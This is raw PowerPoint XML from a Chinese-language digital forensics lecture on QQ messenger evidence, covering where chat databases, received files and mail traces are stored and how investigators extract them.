        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="1043940"/>
            <a:ext cx="7047865" cy="1799590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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sz="16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QQ2006</a:t>
            </a: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版本之前的QQ软件，其聊天记录采用明文或是简单加密的方式进行本地保存，查看或提取聊天记录比较容易，QQ2007至QQ2008之间的版本改进了加密方式，但借助相关工具依然可以轻松破解。但现在，针对QQ取证的技术和工具发展出现了断层，相关研究成果止步于QQ2008版本，对改变加密方式更新推出的QQ2009、QQ2010、QQ2011数据库文件Msg2.0.db中聊天记录的获取，无论是理论研究还是工具研发都突破有限。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.2 技术路线</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="1043940"/>
            <a:ext cx="7047865" cy="3091815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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QQ软件</a:t>
            </a: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的活动痕迹往往保存在不同文件里，或分散在网络的不同节点之中。从信源-信道-信宿[ 传播学概念。信源就是信息的来源，可以是人、机器、自然界的物体等；信道就是信息传递的通道，是将信号进行传输、存储和处理的媒介；信宿就是信息的接受者，可以是人也可以是机器等。]的角度来看，信源的痕迹文件分布在QQ客户端电脑中，信道的痕迹文件分布在中间节点的路由器、交换机和边界安全设备中，信宿的痕迹则在QQ服务器中。而从网络取证的角度来看，通过对捕获的QQ网络数据进行分析、取证的技术已有一些研究，但对加密数据的破解难度较大。目前，QQ取证鉴定的重点主要集中在对QQ聊天记录和接收图片或文件的提取上，而对信道或信宿痕迹的提取仅在非常必要的情况下进行，对QQ网络通信数据进行分析取证也不常见。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.3 取证工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="1043940"/>
            <a:ext cx="7047865" cy="3091815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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目前</a:t>
            </a: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QQ取证工具的发展可以概括为“一点两段”。一点，即关注的着眼点，就是围绕聊天记录的提取开发取证工具；两段，即两个阶段，就是围绕QQ2006-QQ2008版本数据库文件为MsgEx.db的工具研究阶段和QQ2009及其以后版本数据库文件为Msg2.0.db的工具研究阶段。从当前研究取得的成果来看，针对数据库文件MsgEx.db的破解分析技术已经非常成熟，相应的取证工具也比较多，既有QQ专用聊天记录查看器，也有包含QQ等多种即时聊天记录查看软件。但是针对数据库文件Msg2.0.db的取证还没有取得实质性进展，相应的工具产品更是寥寥无几，仅有极少的几款取证工具软件能在特定条件下对其进行查看提取，如俄罗斯Belkasoft公司的Belkasoft Forensic IM Analyzer专业版在用户登陆QQ时勾选了“记住密码”且接入互联网的情况下可以提取到聊天记录信息。</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 TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="1275606"/>
            <a:ext cx="7165712" cy="1974836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开放系统互连参考模型：为使不同计算机厂家生产的计算机能相互通信，以便在更大范围内建立计算机网络，国际标准化组织</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(ISO)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1978</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年提出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开放系统互连参考模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，即著名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI/RM(Open System Interconnection/Reference Model)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开放系统互连参考模型将整个网络的通信功能划分成七个层次，每个层次完成不同的功能。这七层由低层至高层分别是物理层、数据链路层、网络层、传输层、会话层、表示层和应用层。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.4 技术基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788670" y="1043940"/>
            <a:ext cx="7152005" cy="2122805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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QQ软件</a:t>
            </a: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既使用TCP协议又使用UDP协议进行通信，主要基于TCPF(Text chatting Protocol Family)协议族进行。用户首先从QQ服务器上获取好友列表，以建立点对点的连接，在默认情况下，QQ消息传输使用UDP协议并通过各种验证机制来保证信息的可靠发送, 但当UDP协议不能正常转发时就会采用TCP协议进行发送。如果无法直接点对点联系，即消息的接收方网络未链接或故障，则消息通过服务器中转的方式完成。同时，消息服务器会在一段时间内对客服端发送的数据信息进行备份保存，这使得对信宿进行取证成为可能。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.4 技术基础</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="531495"/>
            <a:ext cx="7047865" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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QQ软件安装后会把大量的信息记录在以QQ号码命名的文件夹中，比如该QQ号码的聊天记录和好友列表，而留存在注册表中的信息相对较少，仅有一些安装的路径信息。了解这些文件的功能和作用对QQ取证具有一定的帮助，通过对这些安装文件或文件夹进行分析我们可以得到一些有用的信息，如</a:t>
            </a:r>
            <a:r>
              <a:rPr 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下</a:t>
            </a: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表所示。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995170" y="2075180"/>
            <a:ext cx="5080000" cy="275590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>不同版本QQ重要文件（夹）功能表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1882140" y="2296795"/>
          <a:ext cx="5193030" cy="2654300"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1335088">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1271587">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1135063">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1450975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="266700">
                <a:tc gridSpan="2">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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>QQ2008及以前版本</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>QQ2009及之后版本</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="266700">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文件（夹）名称</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功能</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文件（夹）名称</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功能</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6700">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LoginUinList.dat</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登陆用户列表</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[FileRecv]</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默认接收文件位置</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6700">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Config.db</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>QQ系统设置</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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[Image]</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表情、截图位置</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4000">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ewh.db</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>QQ密码</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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Registry.db</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>自定义图像/好友列表</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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6700">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MsgEx.db</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>QQ聊天记录</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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Msg2.0.db</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聊天记录数据库</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6700">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QQMailSettingEx.dat</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>QQMail设置</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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Info.db</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个人形象的信息</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6700">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MailData</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>QOMail本地邮件</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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Mail.dll</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邮件相关</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6700">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User.db</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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>QQ本地好友列表</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1000" b="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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 </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 </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6700">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[my QQ file]</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默认接收文件位置</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rPr>
                        <a:t> </a:t>
                      </a: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endParaRPr lang="en-US" altLang="en-US" sz="1000" b="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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.5 聊天记录提取</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="531495"/>
            <a:ext cx="7047865" cy="1799590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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对于本地QQ聊天记录的提取因QQ软件的版本不同而有所差异。QQ2008及以前版本的聊天记录保存在安装目录以QQ号码命名的文件夹里，聊天记录的内容保存在MsgEx.db文件中，MsgEx.db文件采用复合文档[ 复合文档（Compound Document）是一种不仅包含文本而且包括图形、电子表格数据、声音、视频图像以及其他信息的文档。]结构，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr 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所示。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1073743077" name="组合 1073743076"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2108835" y="2079625"/>
            <a:ext cx="4570095" cy="2595880"/>
            <a:chOff x="1800" y="7836"/>
            <a:chExt cx="8745" cy="6405"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1073743078" name="图片 1073743077" descr="C:\Documents and Settings\littleone\Application Data\Tencent\Users\51001921\QQ\WinTemp\RichOle\L1[7PJ$13L[XNEDEDC@(0KP.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" r:link="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1800" y="7836"/>
              <a:ext cx="4455" cy="6405"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1073743079" name="图片 1073743078" descr="C:\Documents and Settings\littleone\Application Data\Tencent\Users\51001921\QQ\WinTemp\RichOle\CJI$W(_0L5)20C`VTFW~RJI.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" r:link="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6120" y="7836"/>
              <a:ext cx="4425" cy="6396"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840865" y="4675505"/>
            <a:ext cx="5080000" cy="275590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> MsgEx.db和Msg2.0.db复合文件结构对比图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.6 其他相关证据提取</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="716915"/>
            <a:ext cx="7047865" cy="2122805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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QQ</a:t>
            </a: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是一款即时聊天软件，对其取证，重点确应放在对聊天记录的获取上，因为聊天记录包含的证据信息量多，且可以反应嫌疑人网络通信脉络及过程，除此之外，在取证鉴定实践中还有几个位置我们不能忽略。例如QQ邮件信息，保存图片或截图的“Image”文件夹，默认存放接收文件的“FileRecv/My QQ file”文件夹等，同样可以获取到非常有价值的证据信息，且往往是聊天记录的重要补充或佐证。如找到聊天记录中的重要网银转账的操作界面截图，发现接收到的账单文件等。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.6 其他相关证据提取</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="716915"/>
            <a:ext cx="7047865" cy="2768600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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对</a:t>
            </a:r>
            <a:r>
              <a:rPr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QQ邮件信息</a:t>
            </a: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的取证鉴定与登陆口令相关，邮件内容存储在QQ服务器上，没有登陆口令想要获取邮件信息相对困难，但在取证实战中，我们可以结合对浏览器缓存的取证，找到一些有用的邮件头信息或邮件内容信息。如果一封邮件在本地打开过，就会在本机的浏览器缓存中留下一些邮件头或内容信息。缓存中的QQ邮件因为窗口格式问题可能会使得复原邮件信息位置重叠，难于查看，但对于取证鉴定来说，或许仅仅提取到一个邮件头信息就可能足以支撑起整个证据链。因此，即使我们没有登录口令，我们在对QQ取证的过程中也不能忽视邮件取证这个环节，最好在取证前就将其列入取证步骤计划。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.6 其他相关证据提取</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="716915"/>
            <a:ext cx="7047865" cy="1799590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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对</a:t>
            </a:r>
            <a:r>
              <a:rPr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“Image”</a:t>
            </a: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和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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“FileRecv/My QQ file”</a:t>
            </a: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文件夹下文件信息的勘验和提取是取证鉴定实战中的常用做法，因为每个QQ号码的“Image”文件下保存着该号码接收到的一些图片、屏幕截图或QQ表情图片；而“FileRecv”文件夹（QQ2008版本为“My QQ file”文件夹）下保存着该号码默认接收到的各种类型文件，包括图片、文档、可执行文件、或是压缩文件包等，只要是按“发送文件”方式默认接收都将保存在此文件夹中。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.7.7 QQ取证与分析案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899795" y="716915"/>
            <a:ext cx="7047865" cy="2122805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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zh-CN" altLang="en-US"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案情介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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p>
          <a:p>
            <a:pPr fontAlgn="auto" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
